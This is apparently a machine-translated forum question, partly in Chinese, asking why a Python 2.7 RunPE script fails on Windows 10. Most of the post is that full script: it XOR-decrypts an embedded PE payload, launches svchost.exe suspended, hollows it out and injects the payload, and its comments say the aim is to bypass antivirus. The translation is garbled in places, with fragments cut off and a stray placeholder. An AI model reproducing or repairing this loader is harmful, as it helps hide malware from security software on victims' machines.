我必须学习如何在python下实现runPE(出于教育目的)。在

但是，由于我对这个领域了解不多，所以我试图修改源代码以使它们能够正常工作(因为实际上，在github上发布的python下的所有runPE项目目前都无法工作)。在So I decided to train under the project: https:

//github.com/oueldz4/runpe

首先，为了跟你说清楚，我需要和你谈谈这是什么。在RunPE is the generic name of a technique used by many malware.

This technique consists in launching a new process in pause, then

replacing the memory contents of the executable in pause and finally

to release the process. This allows you to run a complete executable

without having to put it on the disk. This avoids detection by the

antivirus.

所以，正如你所看到的，这种方法被用来感染计算机而不被反病毒检测到。然而，就我而言，我希望实现这个教育项目。安全的世界让我很感兴趣，了解这些机制确实有助于避免在互联网上下载文件而感染自己。在

让我们回到我的问题上来。在

加密程序最终输出以下代码：#!/usr/bin/env python

# This script uses the runpe technique to bypass AV detection

# The payload it contains, is encrypted each time with a random key

# INSTALL pefile and ctypes packages

from itertools import cycle, izip

import sys, pefile

import ctypes

BYTE = ctypes.c_ubyte

WORD = ctypes.c_ushort

DWORD = ctypes.c_ulong

LPSTR = ctypes.c_char_p

HANDLE = ctypes.c_void_p

CREATE_SUSPENDED = 0x0004

MEM_COMMIT = 0x1000

MEM_RESERVE = 0x2000

PAGE_EXECUTE_READWRITE = 0x40

class PROCESS_INFORMATION(ctypes.Structure):

_fields_ = [

('hProcess', HANDLE),

('hThread', HANDLE),

('dwProcessId', DWORD),

('dwThreadId', DWORD),

]

class STARTUPINFO(ctypes.Structure):

_fields_ = [

('cb', DWORD),

('lpReserved', LPSTR),

('lpDesktop', LPSTR),

('lpTitle', LPSTR),

('dwX', DWORD),

('dwY', DWORD),

('dwXSize', DWORD),

('dwYSize', DWORD),

('dwXCountChars', DWORD),

('dwYCountChars', DWORD),

('dwFillAttribute', DWORD),

('dwFlags', DWORD),

('wShowWindow', WORD),

('cbReserved2', WORD),

('lpReserved2', DWORD),

('hStdInput', HANDLE),

('hStdOutput', HANDLE),

('hStdError', HANDLE),

]

class FLOATING_SAVE_AREA(ctypes.Structure):

_fields_ = [

("ControlWord", DWORD),

("StatusWord", DWORD),

("TagWord", DWORD),

("ErrorOffset", DWORD),

("ErrorSelector", DWORD),

("DataOffset", DWORD),

("DataSelector", DWORD),

("RegisterArea", BYTE * 80),

("Cr0NpxState", DWORD),

]

class CONTEXT(ctypes.Structure):

_fields_ = [

("ContextFlags", DWORD),

("Dr0", DWORD),

("Dr1", DWORD),

("Dr2", DWORD),

("Dr3", DWORD),

("Dr6", DWORD),

("Dr7", DWORD),

("FloatSave", FLOATING_SAVE_AREA),

("SegGs", DWORD),

("SegFs", DWORD),

("SegEs", DWORD),

("SegDs", DWORD),

("Edi", DWORD),

("Esi", DWORD),

("Ebx", DWORD),

("Edx", DWORD),

("Ecx", DWORD),

("Eax", DWORD),

("Ebp", DWORD),

("Eip", DWORD),

("SegCs", DWORD),

("EFlags", DWORD),

("Esp", DWORD),

("SegSs", DWORD),

("ExtendedRegisters", BYTE * 80),

]

encryptedbuff = ("\x75\x6c\xa6\x63\x3a\x37\x36\x63\x35\x62\x38\x36\xc9\x9c\x39\x37"

"\x58\x23\x5b\x55\x53\x10\x4a\x0a\x14\x05\x50\x0e\x4b\x53\x14\x4c"

[...]

)

randomkey = '866c976c1b'

filepath = 'C:\Windows\System32\svchost.exe'

si = STARTUPINFO()

si.cb = ctypes.sizeof(STARTUPINFO)

pi = PROCESS_INFORMATION()

cx = CONTEXT()

cx.ContextFlags = 0x10007

key = cycle(randomkey)

decryptedbuff= ''.join(chr(ord(x) ^ ord(y)) for (x,y) in izip(encryptedbuff, key))

# Get payload buffer as PE file

pe = pefile.PE(data=decryptedbuff)

fd_size = len(decryptedbuff)

print "\n[+] Payload size : "+str(fd_size)

calloc = ctypes.cdll.msvcrt.calloc

p = calloc((fd_size+1), ctypes.sizeof(ctypes.c_char))

ctypes.memmove(p, decryptedbuff, fd_size)

print "[+] Pointer : "+str(hex(p))

pefilepath = pefile.PE(filepath)

# Create new process in suspedend mode using a legitim executable (Ex. svchost.exe)

if ctypes.windll.kernel32.CreateProcessA(None, filepath, None, None, False, CREATE_SUSPENDED, None, None, ctypes.byref(si), ctypes.byref(pi)):

print "[+] Process successfuly launched"

print "[+] PID : %d\n" %pi.dwProcessId

else:

print "Failed to create new process"

print "Error Code: ", ctypes.windll.kernel32.GetLastError()

sys.exit(1)

# Unmap the view of sections of the new process created

if ctypes.windll.ntdll.NtUnmapViewOfSection(pi.hProcess, LPSTR(pefilepath.OPTIONAL_HEADER.ImageBase)):

print "[+] Unmap View Of Section Succeed"

else:

print "Failed to unmap the original exe"

print "Error Code: ", ctypes.windll.kernel32.GetLastError()

sys.exit(1)

# Allocate memory to base address of malicious executable in suspended process

if ctypes.windll.kernel32.VirtualAllocEx(pi.hProcess, pe.OPTIONAL_HEADER.ImageBase, pe.OPTIONAL_HEADER.SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE):

print "[+] Virtual Alloc Succeed"

else:

print "Failed to allocate virtual memory"

print "Error Code: ", ctypes.windll.kernel32.GetLastError()

# Write in memory malicious file's header

if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(pe.OPTIONAL_HEADER.ImageBase), p, ctypes.c_int(pe.OPTIONAL_HEADER.SizeOfHeaders), None):

print "[+] Write Process Memory Succeed"

else:

print "Failed to write to process memory"

print "Error Code: ", ctypes.windll.kernel32.GetLastError()

sys.exit(1)

# Write sections one by one to memory

for section in pe.sections:

if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(pe.OPTIONAL_HEADER.ImageBase+section.VirtualAddress), (p+section.PointerToRawData), ctypes.c_int(section.SizeOfRawData), None):

print "[+] Writing Section "+section.Name+" Succeed"

else:

print "Failed to write to process memory"

print "Error Code: ", ctypes.windll.kernel32.GetLastError()

sys.exit(1)

# Get CPU context of this process

if ctypes.windll.kernel32.GetThreadContext(pi.hThread, ctypes.byref(cx)):

print "[+] Get Thread Context Succeed"

else:

print "Failed to get thread context"

print "Error Code: ", ctypes.windll.kernel32.GetLastError()

sys.exit(1)

# Push the address of entry point in eax

cx.Eax = pe.OPTIONAL_HEADER.ImageBase + pe.OPTIONAL_HEADER.AddressOfEntryPoint

# Write ImageBase to Ebx+8

if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(cx.Ebx+8), (p+0x11C), 4, None):

print "[+] Write Process Memory Succeed"

else:

print "Failed to write to process memory"

print "Error Code: ", ctypes.windll.kernel32.GetLastError()

sys.exit(1)

# Replace CPU context

if ctypes.windll.kernel32.SetThreadContext(pi.hThread, ctypes.byref(cx)):

print "[+] Set Thread Context Suceed"

else:

print "Failed to set thread context"

print "Error Code: ", ctypes.windll.kernel32.GetLastError()

sys.exit(1)

# Resume the process so windows continues the execution

if ctypes.windll.kernel32.ResumeThread(pi.hThread):

print "[+] Resume Thread Succeed"

print "\n[*] RunPE Succeed"

else:

print "Failed to resume thread"

print "Error Code: ", ctypes.windll.kernel32.GetLastError()

sys.exit(1)

但是，当我尝试使用svchost.exe在

经过多次研究，我还是不明白为什么会有这个问题。

如果将我使用的函数与C或C++中的一些等效项目进行比较，它们看起来是正确和合适的。在

实际上，我的代码通过以下函数：

^{pr2}$

我开始注意到这个项目，它指出了必须遵循哪些步骤才能获得所需的结果：http://www.rohitab.com/discuss/topic/40262-dynamic-forking-process-hollowing/。

实际上，使用这些函数的顺序是不一样的。然而，在我看来，oueldz4项目github中使用的函数似乎与作者留下的评论有关。在

有人能帮我更好地了解这个问题的起因吗？我不知道我错过了什么。。。在

注：我正在尝试在Windows10 64位和Python2.7 32位下执行此操作。此外，我缩短了邮件中的encryptedbuff变量，因为它占用了太多空间。在